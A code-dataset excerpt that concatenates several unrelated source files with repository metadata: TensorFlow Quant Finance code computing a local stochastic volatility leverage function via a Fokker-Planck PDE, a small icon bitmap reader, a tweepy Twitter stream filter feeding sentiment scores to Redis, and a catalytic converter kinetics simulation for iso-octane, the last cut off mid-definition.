      dtype: The default dtype to use when converting values to `Tensor`s.
        Default value: `None` which means that default dtypes inferred by
        TensorFlow are used.

    Returns:
      An instance of `LocalStochasticVolatilityModel` constructed using the
      input data.
    """
    if risk_free_rate is None:
      discount_factor_fn = lambda t: tf.ones_like(t, dtype=dtype)
    else:
      r = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
      discount_factor_fn = lambda t: tf.math.exp(-r * t)
    lv_model = lvm.LocalVolatilityModel.from_volatility_surface(
        dim=1,
        spot=initial_spot,
        implied_volatility_surface=implied_volatility_surface,
        discount_factor_fn=discount_factor_fn,
        dividend_yield=dividend_yield,
        dtype=dtype)

    dtype = dtype or lv_model.dtype()
    # Horizon of the PDE solve: time to the furthest surface node, measured
    # with the surface's own day count convention.
    day_count_fn = utils.get_daycount_fn(
        implied_volatility_surface.daycount_convention)
    max_time = tf.math.reduce_max(
        day_count_fn(
            start_date=implied_volatility_surface.settlement_date(),
            end_date=implied_volatility_surface.node_expiries()))
    if time_step is None:
      time_step = max_time / 100.0

    rho = rho or 0.0
    num_grid_points = num_grid_points or 100

    leverage_fn = _leverage_function_using_pde(
        risk_free_rate=risk_free_rate,
        dividend_yield=dividend_yield,
        lv_model=lv_model,
        variance_model=variance_process,
        rho=[rho],
        initial_spot=initial_spot,
        initial_variance=initial_variance,
        time_step=time_step,
        max_time=max_time,
        num_grid_points=num_grid_points,
        grid_minimums=grid_minimums,
        grid_maximums=grid_maximums,
        dtype=dtype)
    return LocalStochasticVolatilityModel(
        leverage_fn,
        variance_process,
        risk_free_rate=risk_free_rate,
        dividend_yield=dividend_yield,
        rho=rho,
        dtype=dtype)
def _create_corr_matrix(rho, dtype):
  """Builds the 2x2 correlation matrix `[[1, rho], [rho, 1]]`.

  Args:
    rho: A scalar or length-1 value (Python number, list or `Tensor`)
      containing the spot/variance correlation.
    dtype: dtype of the returned matrix.

  Returns:
    A `Tensor` of shape `[2, 2]` containing the correlation matrix.
  """
  # Reshape to rank 1 so that both a Python scalar (the constructor's default
  # `rho = 0.0` path) and a length-1 list/tensor are accepted: `tf.concat`
  # requires all inputs to have matching rank and rejects rank-0 (scalar)
  # inputs outright.
  rho = tf.reshape(tf.convert_to_tensor(rho, dtype=dtype), [1])
  one = tf.ones_like(rho)
  first_row = tf.concat([one, rho], axis=0)
  second_row = tf.concat([rho, one], axis=0)
  return tf.stack([first_row, second_row])
def _machine_eps(dtype):
  """Returns a small dtype-dependent tolerance for the supplied dtype.

  NOTE: these are fixed tolerances (1e-6 for float32, 1e-10 otherwise), not
  the true machine epsilon of the dtype.
  """
  numpy_dtype = tf.as_dtype(dtype).as_numpy_dtype
  return 1e-6 if numpy_dtype == np.float32 else 1e-10
def _two_d_integration(grid, value_grid):
  """Integrates `value_grid` over the 2-D `grid` via a left Riemann sum."""
  log_spot_mesh, variance_mesh = tf.meshgrid(*grid)
  # Cell widths along the variance axis (rows) and log-spot axis (columns).
  dv = variance_mesh[1:, :] - variance_mesh[:-1, :]
  ds = log_spot_mesh[:, 1:] - log_spot_mesh[:, :-1]
  # First integrate out the variance dimension, then the log-spot dimension.
  inner = tf.math.reduce_sum(value_grid[0, :-1, :] * dv, axis=0)
  return tf.math.reduce_sum(inner[:-1] * ds[0, :])
# TODO(b/175023506): Move to `grids` module
def _tavella_randell_nonuniform_grid(x_min, x_max, x_star, num_grid_points,
                                     alpha, dtype):
  """Creates non-uniform grid clustered around a specified point.

  The grid nodes are images of a uniform partition of `[0, 1]` under a sinh
  transform centered at `x_star`, following the Tavella-Randall construction.

  Args:
    x_min: A real `Tensor` of shape `(dim,)` specifying the lower limit of the
      grid.
    x_max: A real `Tensor` of same shape and dtype as `x_min` specifying the
      upper limit of the grid.
    x_star: A real `Tensor` of same shape and dtype as `x_min` specifying the
      location on the grid around which higher grid density is desired.
    num_grid_points: A scalar integer `Tensor` specifying the number of points
      on the grid.
    alpha: A scalar parameter which controls the degree of non-uniformity of
      the grid. Smaller values of `alpha` produce stronger clustering around
      `x_star`.
    dtype: The default dtype to use when converting values to `Tensor`s.

  Returns:
    A real `Tensor` of shape `(dim, num_grid_points+1)` containing the
    non-uniform grid.
  """
  lower = tf.math.asinh((x_min - x_star) / alpha)
  upper = tf.math.asinh((x_max - x_star) / alpha)
  # Column of node indices 0..num_grid_points, shape (num_grid_points+1, 1).
  indices = tf.expand_dims(
      tf.range(0, num_grid_points + 1, 1, dtype=dtype), axis=-1)
  grid = x_star + alpha * tf.math.sinh(
      upper * indices / num_grid_points +
      lower * (1 - indices / num_grid_points))
  # Reshape from (num_grid_points+1, dim) to (dim, num_grid_points+1).
  return tf.transpose(grid)
def _conditional_expected_variance_from_pde_solution(grid, value_grid, dtype):
  """Computes E[variance|log_spot=k] from the joint density on `grid`."""
  # `value_grid` has shape [1, num_x, num_y].
  log_spot_mesh, variance_mesh = tf.meshgrid(*grid)
  # Cell widths along the variance axis.
  dv = variance_mesh[1:, :] - variance_mesh[:-1, :]
  density = value_grid[0, :-1, :]
  # I_0(k) = int p(k, v) dv and I_1(k) = int v p(k, v) dv.
  integral_0 = tf.math.reduce_sum(density * dv, axis=0)
  integral_1 = tf.math.reduce_sum(
      variance_mesh[:-1, :] * density * dv, axis=0)
  expected_variance = tf.math.divide_no_nan(integral_1, integral_0)
  # Return an interpolator over log-spot for the conditional expectation.
  return functools.partial(
      linear.interpolate,
      x_data=log_spot_mesh[0, :],
      y_data=expected_variance,
      dtype=dtype)
def _leverage_function_using_pde(*, risk_free_rate, dividend_yield, lv_model,
variance_model, rho, initial_spot,
initial_variance, max_time, time_step,
num_grid_points, grid_minimums,
grid_maximums, dtype):
"""Computes Leverage function using Fokker-Planck PDE for joint density.
This function computes the leverage function for the LSV model by first
computing the joint probablity density function `p(t, X(t), v(t))` where
`X(t)` is the log of the spot price and `v(t)` is the variance at time `t`.
The joint probablity density is computed using the Fokker-Planck equation of
the LSV model (see 6.8.2 in Ref [1]):
```None
dp/dt = 1/2 d^2 [v L(t,X)^2 p]/dX^2 + 1/2 d^2 [b(v)^2 p]/dv^2 +
rho d^2 [sqrt(v)L(t,X)b(v) p]/dXdv - d[(r - d - 1/2 v L(t,X)^2)p]/dX -
d[a(v) p]/dv
```
where `a(v)` and `b(v)` are the drift and diffusion functions for the
variance process. Defining
```None
I_n(k,t) = int v^n p(t, k, v) dv
```
we can calculate the leverage function as follows:
```None
L(k, t) = sigma(exp(k), t) sqrt(I_0(k, t)/I_1(k, t)).
```
Args:
risk_free_rate: A scalar real `Tensor` specifying the (continuosly
compounded) risk free interest rate. If the underlying is an FX rate, then
use this input to specify the domestic interest rate.
dividend_yield: A real scalar `Tensor` specifying the (continuosly
compounded) dividend yield. If the underlying is an FX rate, then use this
input to specify the foreign interest rate.
lv_model: An instance of `LocalVolatilityModel` specifying the local
volatility for the spot price.
variance_model: An instance of `LSVVarianceModel` specifying the dynamics of
the variance process of the LSV model.
rho: A real scalar `Tensor` specifying the correlation between spot price
and the stochastic variance.
initial_spot: A real scalar `Tensor` specifying the underlying spot price on
the valuation date.
initial_variance: A real scalar `Tensor` specifying the initial variance on
the valuation date.
max_time: A real scalar `Tensor` specifying the maximum time to which the
Fokker-Planck PDE is evolved.
time_step: A real scalar `Tensor` specifying the time step during the
numerical solution of the Fokker-Planck PDE.
num_grid_points: A scalar integer `Tensor` specifying the number of
discretization points for each spatial dimension.
grid_minimums: An optional `Tensor` of size 2 containing the minimum grid
points for PDE spatial discretization. `grid_minimums[0]` correspond
to the minimum spot price in the spatial grid and `grid_minimums[1]`
correspond to the minimum variance value.
grid_maximums: An optional `Tensor` of size 2 containing the maximum grid
points for PDE spatial discretization. `grid_maximums[0]` correspond
to the maximum spot price in the spatial grid and `grid_maximums[1]`
correspond to the maximum variance value.
dtype: The default dtype to use when converting values to `Tensor`s.
Returns:
A Python callable which computes the Leverage function `L(t, S(t))`. The
function accepts a scalar `Tensor` corresponding to time 't' and a real
`Tensor` of shape `[num_samples, 1]` corresponding to the spot price (S) as
inputs and return a real `Tensor` corresponding to the leverage function
computed at (S,t).
"""
if variance_model.dim() > 1:
raise ValueError("The default model of Leverage function doesn\'t support "
"the variance process with more than 1 factor.")
pde_grid_tol = _machine_eps(dtype)
rho = tf.convert_to_tensor(rho, dtype=dtype)
initial_spot = tf.convert_to_tensor(initial_spot, dtype=dtype)
initial_log_spot = tf.math.log(
tf.convert_to_tensor(initial_spot, dtype=dtype))
initial_variance = tf.convert_to_tensor(initial_variance, dtype=dtype)
risk_free_rate = tf.convert_to_tensor(risk_free_rate, dtype=dtype)
dividend_yield = tf.convert_to_tensor(dividend_yield, dtype=dtype)
rho = tf.convert_to_tensor(rho, dtype=dtype)
x_scale = initial_log_spot
y_scale = initial_variance
# scaled log spot = log(spot/initial_spot)
# scaled variance = variance / initial_variance
scaled_initial_point = tf.convert_to_tensor([0.0, 1.0], dtype=dtype)
# These are minimums and maximums for scaled log spot and scaled variance
if grid_minimums is None:
grid_minimums = [0.01, 0.0001]
else:
grid_minimums = tf.convert_to_tensor(grid_minimums, dtype=dtype)
grid_minimums = [grid_minimums[0] / initial_spot,
grid_minimums[1] / initial_variance]
if grid_maximums is None:
grid_maximums = [10.0, 5.0]
else:
grid_maximums = tf.convert_to_tensor(grid_maximums, dtype=dtype)
grid_maximums = [grid_maximums[0] / initial_spot,
grid_maximums[1] / initial_variance]
log_spot_min = tf.math.log(
tf.convert_to_tensor([grid_minimums[0]], dtype=dtype))
log_spot_max = tf.math.log(
tf.convert_to_tensor([grid_maximums[0]], dtype=dtype))
variance_min = tf.convert_to_tensor([grid_minimums[1]], dtype=dtype)
variance_max = tf.convert_to_tensor([grid_maximums[1]], dtype=dtype)
grid_minimums = tf.concat([log_spot_min, variance_min], axis=0)
grid_maximums = tf.concat([log_spot_max, variance_max], axis=0)
grid = _tavella_randell_nonuniform_grid(grid_minimums, grid_maximums,
scaled_initial_point, num_grid_points,
0.3, dtype)
grid = [tf.expand_dims(grid[0], axis=0), tf.expand_dims(grid[1], axis=0)]
delta_x = tf.math.reduce_min(grid[0][0, 1:] - grid[0][0, :-1])
delta_y = tf.math.reduce_min(grid[1][0, 1:] - grid[1][0, :-1])
# Initialize leverage function L(t=0, S) = 1
leverage_fn = functools.partial(
linear.interpolate, x_data=[[0.0, 1.0]], y_data=[[1.0, 1.0]], dtype=dtype)
  def _initial_value():
    """Computes initial value as a delta function delta(log_spot(t), var(0))."""
    # Discrete approximation of a Dirac delta on the 2-D (log-spot, variance)
    # grid: mass 1 / (delta_x * delta_y * 4) is placed on every grid cell
    # within one (minimum) grid spacing of the scaled initial point, zero
    # elsewhere. NOTE(review): on this non-uniform grid the density
    # presumably integrates to ~1 only approximately -- confirm.
    log_spot, variance = tf.meshgrid(*grid)
    init_value = tf.where(
        tf.math.logical_and(
            tf.math.abs(log_spot - scaled_initial_point[0]) <
            delta_x + pde_grid_tol,
            tf.math.abs(variance - scaled_initial_point[1]) <
            delta_y + pde_grid_tol), 1.0 / (delta_x * delta_y * 4), 0.0)
    # initial_value.shape = (1, num_grid_x, num_grid_y)
    return tf.expand_dims(init_value, axis=0)
  def _second_order_coeff_fn(t, grid):
    """Second order (diffusion) coefficients of the Fokker-Planck PDE.

    `grid[0]` is scaled log-spot and `grid[1]` is scaled variance; both are
    un-scaled before evaluating the leverage and variance-model volatility.
    """
    log_spot = grid[0] + x_scale
    variance = grid[1] * y_scale
    leverage_fn_t_x = leverage_fn(log_spot)
    val_xx = 0.5 * variance * leverage_fn_t_x**2
    val_xy = 0.5 * (rho * tf.math.sqrt(variance) * leverage_fn_t_x *
                    variance_model.volatility_fn()(t, variance)) / y_scale
    val_yx = val_xy
    val_yy = 0.5 * variance_model.volatility_fn()(t, variance)**2 / y_scale**2
    # return list of shape = (2,2). Each element has shape = grid.shape
    # NOTE(review): the negative signs presumably follow the coefficient
    # convention of `pde.fd_solvers.solve_forward`'s
    # `inner_second_order_coeff_fn` -- confirm against the solver docs.
    return [[-val_yy, -val_yx], [-val_xy, -val_xx]]
  def _first_order_coeff_fn(t, grid):
    """First order (drift) coefficients of the Fokker-Planck PDE.

    Returned in grid order [variance axis, log-spot axis], matching the
    second-order coefficients above.
    """
    log_spot = grid[0] + x_scale
    variance = grid[1] * y_scale
    leverage_fn_t_x = leverage_fn(log_spot)
    # Log-spot drift: risk-neutral rate differential minus the Ito correction
    # 0.5 * variance * L(t, x)^2.
    val_x = (risk_free_rate - dividend_yield -
             0.5 * variance * leverage_fn_t_x**2)
    val_y = variance_model.drift_fn()(t, variance)
    # return list of shape = (2,). Each element has shape = grid.shape
    return [val_y / y_scale, val_x]
  def _compute_leverage_fn(t, coord_grid, value_grid):
    """Rebuilds the leverage function from the current PDE solution.

    Computes L(t, x) = sigma_LV(t, S) / sqrt(E[variance | log_spot = x]) on
    the spatial grid (cf. the `L(k, t)` formula in the module docstring) and
    returns a 1-D linear interpolator in log-spot.
    """
    log_spot = tf.expand_dims(coord_grid[0], axis=-1) + x_scale
    local_volatility_values = lv_model.local_volatility_fn()(
        t, tf.math.exp(log_spot))
    # TODO(b/176826650): Large values represent instability. Eventually this
    # should be addressed inside local vol model.
    local_volatility_values = tf.where(
        tf.math.abs(local_volatility_values) > 1e4, 0.0,
        local_volatility_values)
    # variance_given_logspot.shape = (num_grid_x, 1)
    variance_given_logspot = _conditional_expected_variance_from_pde_solution(
        [coord_grid[0] + x_scale, coord_grid[1] * y_scale], value_grid, dtype)(
            log_spot)
    # divide_no_nan guards grid points where the conditional variance is zero
    # (no probability mass yet).
    leverage_fn_values = tf.math.divide_no_nan(
        local_volatility_values, tf.math.sqrt(variance_given_logspot))
    leverage_fn = functools.partial(
        linear.interpolate,
        x_data=grid[0] + x_scale,
        y_data=tf.transpose(leverage_fn_values),
        dtype=dtype)

    return leverage_fn
  @pde.boundary_conditions.neumann
  def _trivial_neumann_boundary(t, location_grid):
    """Homogeneous Neumann (zero normal derivative) boundary condition."""
    del t, location_grid  # unused; the condition is constant
    return 0.0
leverage_fn_values = []
leverage_fn_values.append(leverage_fn(grid[0][0])[0])
# joint_density.shape = (1, num_grid_x, num_grid_y)
joint_density = _initial_value()
for tstart in np.arange(0.0, max_time, time_step):
joint_density, coord_grid, _, _ = pde.fd_solvers.solve_forward(
tstart,
tstart + time_step,
coord_grid=[grid[0][0], grid[1][0]],
values_grid=joint_density,
time_step=time_step / 10.0,
values_transform_fn=None,
inner_second_order_coeff_fn=_second_order_coeff_fn,
inner_first_order_coeff_fn=_first_order_coeff_fn,
zeroth_order_coeff_fn=None,
boundary_conditions=[[
_trivial_neumann_boundary, _trivial_neumann_boundary
], [_trivial_neumann_boundary, _trivial_neumann_boundary]],
dtype=dtype)
joint_density = tf.math.maximum(joint_density, 0.0)
area_under_joint_density = _two_d_integration(
[grid[0][0, :], grid[1][0, :]], joint_density)
joint_density = joint_density / area_under_joint_density
# TODO(b/176826743): Perform fixed point iteration instead of one step
# update
leverage_fn = _compute_leverage_fn(
tf.convert_to_tensor(tstart + time_step), coord_grid, joint_density)
leverage_fn_values.append(leverage_fn(grid[0][0, :] + x_scale)[0, :])
# leverage_fn_values.shape = (num_pde_timesteps, num_grid_x,)
leverage_fn_values = tf.convert_to_tensor(leverage_fn_values, dtype=dtype)
times = tf.range(0.0, max_time + time_step, time_step, dtype=dtype)
  def _return_fn(t, spot):
    """Evaluates the leverage function L(t, S) for a given time and spot.

    `t` is a scalar time and `spot` a `[num_samples, 1]` tensor of spot
    prices; interpolation is performed in (time, log-spot) over the values
    precomputed on the PDE grid.
    """
    leverage_fn_interpolator = (
        math.interpolation.interpolation_2d.Interpolation2D(
            x_data=[times],
            y_data=tf.expand_dims(
                tf.repeat(grid[0] + x_scale, times.shape[0], axis=0), axis=0),
            z_data=tf.expand_dims(leverage_fn_values, axis=0),
            dtype=dtype))
    # Spot is mapped to log-spot to match the PDE's spatial coordinate.
    return leverage_fn_interpolator.interpolate(t, tf.math.log(spot))
return _return_fn
| [
"tf-quant-finance-robot@google.com"
] | tf-quant-finance-robot@google.com |
e0c77c4ae13d656c7c5a7e9bd4f0314f052b9c54 | 0a87b342e79bcd86e6ed75a41938d6f7308976ae | /mm/editor/motif/bandwidthbadicon.py | 2fc7a53f2501efa1a653fde8caeedea61e17adc4 | [
"MIT"
] | permissive | scooter23/grins | 3f54f8d81a318b7dac3dd507040c33c7b6ec1edc | 7ac661912dd77d474cf3deba522d815fb906efcc | refs/heads/master | 2021-06-13T12:10:43.898100 | 2017-03-06T23:11:33 | 2017-03-06T23:11:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,210 | py | __version__ = "$Id$"
import imgformat
import struct
_bigendian = struct.pack('i', 1)[0] == '\0'
class reader:
def __init__(self):
self.width = 16
self.height = 16
format = imgformat.colormap
self.format = format
self.format_choices = (format,)
import imgcolormap
if _bigendian:
self.colormap = imgcolormap.new('''\
\0\0\0\0\0\1\1\1\0\0\0\377\0\377\377\377''')
else:
self.colormap = imgcolormap.new('''\
\0\0\0\0\1\1\1\0\377\0\0\0\377\377\377\0''')
self.transparent = 1
self.top = 0
self.left = 0
self.aspect = 0
def read(self):
return '''\
\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\
\1\1\1\0\0\0\0\1\1\1\1\1\1\1\1\1\1\1\0\2\2\2\2\0\1\1\1\1\1\1\0\0\0\0\0\2\
\2\2\2\0\0\0\1\1\1\0\3\0\2\2\2\2\2\2\2\2\2\2\0\1\1\0\3\0\2\2\2\2\2\2\2\2\
\2\2\0\1\1\0\3\0\2\2\2\2\2\2\2\2\2\2\0\1\1\0\3\0\2\2\2\2\2\2\2\2\2\2\0\1\
\1\1\0\0\0\0\0\2\2\2\2\0\0\0\1\1\1\1\1\1\1\1\0\2\2\2\2\0\1\1\1\1\1\1\1\1\
\1\1\1\0\0\0\0\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\
\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\1\
\1\1\1\1'''
| [
"sjoerdmullender@users.noreply.github.com"
] | sjoerdmullender@users.noreply.github.com |
12a600277c5664b9624e6e9a05ad727b99875ff9 | 1826b207b33c2fda8c4ca227f344021a782d5311 | /twitter_filter.py | 14f4cf763f1a46fb3f4b772dc2cc3edf5fc444d2 | [] | no_license | 532839167/Streaming_Twitter_Filter_and_Sentiment_Analyzer | 5c8a78716048d49282b65a525461b6b8af21760b | c6097543964f590d5d42ad8f842cfd880fc89ece | refs/heads/main | 2023-06-18T15:06:39.331176 | 2021-07-16T23:01:10 | 2021-07-16T23:01:10 | 386,505,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,896 | py | import tweepy
import datetime
import json
import re
from tweet_analyzer import TweetAnalyzer
from tweet_store import TweetStore
from langdetect import detect
from langdetect import DetectorFactory
# Twitter API credentials are kept out of the source tree in a JSON config
# with keys: consumer_key, consumer_secret, access_token, access_token_secret.
file_path = 'config/api.json'
with open(file_path) as f:
    twitter_api = json.loads(f.read())

consumer_key = twitter_api['consumer_key']
consumer_secret = twitter_api['consumer_secret']
access_token = twitter_api['access_token']
access_token_secret = twitter_api['access_token_secret']

# OAuth 1a authentication for the streaming API.
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)

# Sink for processed tweets (pushed to Redis below).
store = TweetStore()
# Fix langdetect's internal seed so language detection is deterministic.
DetectorFactory.seed = 0
class StreamListener(tweepy.StreamListener):
    """Tweepy stream listener that filters, scores, and stores English tweets.

    Keeps only original (non-retweet) tweets containing Latin letters that
    langdetect classifies as English, runs sentiment analysis on them, and
    pushes the result to the Redis-backed TweetStore.
    """

    def on_status(self, status):
        """Handle one incoming tweet from the stream."""
        # Skip retweets and tweets without any Latin letters (langdetect
        # cannot classify letter-free text).
        if 'RT @' in status.text or not re.search('[a-zA-Z]', status.text):
            return
        try:
            if detect(status.text) != 'en':
                return
        except Exception:
            # langdetect raises LangDetectException when the text has no
            # detectable features (e.g. only emoji/URLs). Skip such tweets
            # instead of letting the exception kill the stream.
            return
        # Build the analyzer lazily and reuse it: constructing TweetAnalyzer
        # for every status repeats its (potentially expensive) setup.
        if not hasattr(self, '_analyzer'):
            self._analyzer = TweetAnalyzer()
        polarity = self._analyzer.predict(status.text)
        tweet_item = {
            'id_str': status.id_str,
            'text': status.text,
            'polarity': polarity,
            'username': status.user.screen_name,
            'name': status.user.name,
            'profile_image_url': status.user.profile_image_url,
            'received_at': datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        }
        store.push(tweet_item)
        print("Pushed to redis:", tweet_item)

    def on_error(self, status_code):
        """Disconnect on HTTP 420 (rate limiting); otherwise keep listening."""
        if status_code == 420:
            return False
# Wire the listener into a live filtered stream and start consuming.
stream_listener = StreamListener()
stream = tweepy.Stream(auth=api.auth, listener=stream_listener)
# Track mentions of the major tech companies.
# Fixed typo: "@Netfilix" -> "@Netflix" (the misspelled handle tracked the
# wrong/nonexistent account).
stream.filter(track=["@Facebook", "@Microsoft", "@Apple", "@Google", "@Amazon", "@Netflix"])
| [
"jinsong99598@gmail.com"
] | jinsong99598@gmail.com |
b8b2af93b730f68a65bcde03cb8027561c905d39 | f8fe6eec5dc1200a112a13dcd2102af4fccf2417 | /scripts/python/catalyst/updatedTWC/iso-octane.py | d5499b4325f67c7a245739ee71f4efc26082e693 | [
"MIT"
] | permissive | aladshaw3/cats | c507b01c97a0aebf69aae1d6a12a3df20805527a | 289fdc0712cbb1c000dd42a84f5a7eb57e848cdc | refs/heads/master | 2023-08-31T06:33:07.571570 | 2023-08-19T04:53:58 | 2023-08-19T04:53:58 | 245,455,360 | 5 | 4 | MIT | 2023-09-03T16:22:27 | 2020-03-06T15:33:35 | Assembly | UTF-8 | Python | false | false | 10,972 | py | # This file is a demo for the 'Isothermal_Monolith_Simulator' object
import sys
sys.path.append('../..')
from catalyst.isothermal_monolith_catalysis import *
# Give x, y, z for the HC (CxHyOz)
HC_name = "iso-octane"
x = 8
y = 18
z = 0
O2_in = 7300
CO2_in = 130000
H2O_in = 130000
CO_in = 5000 #5070
H2_in = 1670
NO_in = 1070 #1040
NH3_in = 0
N2O_in = 0
HC_in = 3000/x
custom_zaxis = [0,0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1.0,
1.2,1.4,1.6,1.8,2.0,2.2,2.4,2.6,2.8,3.0,
3.25, 3.5, 3.75, 4.0, 4.5, 5]
# Experimental light-off and temperature histories for this hydrocarbon.
data = naively_read_data_file("inputfiles/"+HC_name+"_lightoff_history.txt",factor=2)
temp_data = naively_read_data_file("inputfiles/"+HC_name+"_temp_history.txt",factor=2)

# Select the simulation time points from the measured time series.
time_list = time_point_selector(data["time"], data, end_time=54)

# Build the monolith simulator: axial mesh, time mesh, and the data meshes
# used to compare against experiment (data recorded at the 5 cm outlet).
sim = Isothermal_Monolith_Simulator()
sim.add_axial_dim(point_list=custom_zaxis)
sim.add_axial_dataset(5)

sim.add_temporal_dim(point_list=time_list)
sim.add_temporal_dataset(data["time"])

sim.add_age_set("A0")
sim.add_data_age_set("A0")

sim.add_temperature_set("T0")
sim.add_data_temperature_set("T0")

# All simulated gas species; only a subset has measured outlet data.
sim.add_gas_species(["HC","CO","NO","N2O","NH3","H2","O2","H2O","CO2"])
sim.add_data_gas_species(["HC","CO","NO","N2O","NH3"])

sim.set_data_values_for("HC","A0","T0",5,data["time"],data["HC"])
sim.set_data_values_for("CO","A0","T0",5,data["time"],data["CO"])
sim.set_data_values_for("NO","A0","T0",5,data["time"],data["NO"])
sim.set_data_values_for("N2O","A0","T0",5,data["time"],data["N2O"])
sim.set_data_values_for("NH3","A0","T0",5,data["time"],data["NH3"])

# Reaction network: each entry names a reaction and its rate-law type; the
# kinetic parameters are supplied per reaction below.
sim.add_reactions({
    # CO + 0.5 O2 --> CO2
    "r1": ReactionType.Arrhenius,

    # H2 + 0.5 O2 --> H2O
    "r2": ReactionType.Arrhenius,

    # CO + NO --> CO2 (+ 0.5 N2)
    "r4": ReactionType.Arrhenius,

    # CO + 2 NO --> CO2 + N2O
    "r5": ReactionType.Arrhenius,

    # 2.5 CO + NO + 1.5 H2O --> 2.5 CO2 + NH3
    "r8": ReactionType.Arrhenius,

    # CO + H2O <-- --> CO2 + H2
    "r11": ReactionType.EquilibriumArrhenius,

    # 2.5 H2 + NO --> NH3 + H2O
    "r6": ReactionType.Arrhenius,

    # H2 + NO --> H2O (+ 0.5 N2)
    "r7": ReactionType.Arrhenius,

    # H2 + 2 NO --> N2O + H2O
    "r14": ReactionType.Arrhenius,

    # NH3 + NO + 0.25 O2 --> 1.5 H2O (+ N2)
    "r15": ReactionType.Arrhenius,

    # HC oxidation
    # CxHyOz + (x + (y/4) - (z/2)) O2 --> x CO2 + (y/2) H2O
    "r3": ReactionType.Arrhenius,

    # HC Steam Reforming
    # CxHyOz + (x-z) H2O --> x CO + (x + (y/2) - z) H2
    "r12": ReactionType.Arrhenius,

    # HC NO reduction
    # CxHyOz + (2x + (y/2) - z) NO --> x CO2 + (y/2) H2O + (x + (y/4) - (z/2)) N2
    "r10": ReactionType.Arrhenius,
})

# Monolith geometry and flow conditions.
sim.set_bulk_porosity(0.775)
sim.set_washcoat_porosity(0.4)
sim.set_reactor_radius(1)
sim.set_space_velocity_all_runs(500)
sim.set_cell_density(93)

# Kinetic parameters per reaction: "A" is the pre-exponential factor and "E"
# the activation energy ("dH"/"dS" are the equilibrium enthalpy/entropy for
# EquilibriumArrhenius reactions). Units follow the catalyst package's
# conventions -- presumably J/mol for E; confirm in the package docs.

# CO + 0.5 O2 --> CO2
r1 = {"parameters": {"A": 1.6550871137667489e+31, "E": 235293.33281046877},
      "mol_reactants": {"CO": 1, "O2": 0.5},
      "mol_products": {"CO2": 1},
      "rxn_orders": {"CO": 1, "O2": 1}
      }

# H2 + 0.5 O2 --> H2O
r2 = {"parameters": {"A": 1.733658868809338e+24, "E": 158891.38869742613},
      "mol_reactants": {"H2": 1, "O2": 0.5},
      "mol_products": {"H2O": 1},
      "rxn_orders": {"H2": 1, "O2": 1}
      }

# CO + NO --> CO2 (+ 0.5 N2)
r4 = {"parameters": {"A": 3.473335911420499e+36, "E": 304924.98618328216},
      "mol_reactants": {"CO": 1, "NO": 1},
      "mol_products": {"CO2": 1},
      "rxn_orders": {"CO": 1, "NO": 1}
      }

# CO + 2 NO --> CO2 + N2O
r5 = {"parameters": {"A": 3.174729324826581e+22, "E": 170429.67328083533},
      "mol_reactants": {"CO": 1, "NO": 2},
      "mol_products": {"CO2": 1, "N2O": 1},
      "rxn_orders": {"CO": 1, "NO": 1}
      }

# 2.5 CO + NO + 1.5 H2O --> 2.5 CO2 + NH3
r8 = {"parameters": {"A": 1.8767305119846367e+38, "E": 304127.76066024584},
      "mol_reactants": {"CO": 2.5, "NO": 1, "H2O": 1.5},
      "mol_products": {"CO2": 2.5, "NH3": 1},
      "rxn_orders": {"CO": 1, "NO": 1, "H2O": 1}
      }

# CO + H2O <-- --> CO2 + H2  (water-gas shift, reversible)
r11 = {"parameters": {"A": 1.8429782328496848e+17, "E": 136610.55181420766,
                      "dH": 16769.16637626293, "dS": 139.10839203326302},
       "mol_reactants": {"CO": 1, "H2O": 1},
       "mol_products": {"H2": 1, "CO2": 1},
       "rxn_orders": {"CO": 1, "H2O": 1, "CO2": 1, "H2": 1}
       }

# 2.5 H2 + NO --> NH3 + H2O
r6 = {"parameters": {"A": 9.075483439125227e+16, "E": 90733.41643967327},
      "mol_reactants": {"H2": 2.5, "NO": 1},
      "mol_products": {"NH3": 1, "H2O": 1},
      "rxn_orders": {"H2": 1, "NO": 1}
      }

# H2 + NO --> H2O (+ 0.5 N2)
r7 = {"parameters": {"A": 190025116968837.8, "E": 62830.56919380204},
      "mol_reactants": {"H2": 1, "NO": 1},
      "mol_products": {"H2O": 1},
      "rxn_orders": {"H2": 1, "NO": 1}
      }

# H2 + 2 NO --> N2O + H2O
r14 = {"parameters": {"A": 606598964637.8237, "E": 43487.90521352834},
       "mol_reactants": {"H2": 1, "NO": 2},
       "mol_products": {"N2O": 1, "H2O": 1},
       "rxn_orders": {"H2": 1, "NO": 1}
       }

# NOTE: It is believed that HCs should have HIGHER activation energies than CO

# NH3 + NO + 0.25 O2 --> 1.5 H2O (+ N2)
r15 = {"parameters": {"A": 1.0E+41, "E": 300000},
       "mol_reactants": {"NH3": 1, "NO": 1, "O2": 0.25},
       "mol_products": {"H2O": 1.5},
       "rxn_orders": {"NH3": 1, "NO": 1, "O2": 1}
       }

# HC oxidation
# CxHyOz + (x + (y/4) - (z/2)) O2 --> x CO2 + (y/2) H2O
r3 = {"parameters": {"A": 1.689916847226846e+18, "E": 124704.19832103234},
      "mol_reactants": {"HC": 1, "O2": (x + y/4 - z/2)},
      "mol_products": {"H2O": y/2, "CO2": x},
      "rxn_orders": {"HC": 1, "O2": 1}
      }

# HC NO reduction
# CxHyOz + (2x + (y/2) - z) NO --> x CO2 + (y/2) H2O + (x + (y/4) - (z/2)) N2
r10 = {"parameters": {"A": 8.592122512925783e+24, "E": 251566.45460992216},
       "mol_reactants": {"HC": 1, "NO": (2*x + y/2 - z)},
       "mol_products": {"H2O": y/2, "CO2": x},
       "rxn_orders": {"HC": 1, "NO": 1}
       }

# HC Steam Reforming
# CxHyOz + (x-z) H2O --> x CO + (x + (y/2) - z) H2
r12 = {"parameters": {"A": 4.8431702008771064e+15, "E": 125210.01500049492},
       "mol_reactants": {"HC": 1, "H2O": x - z},
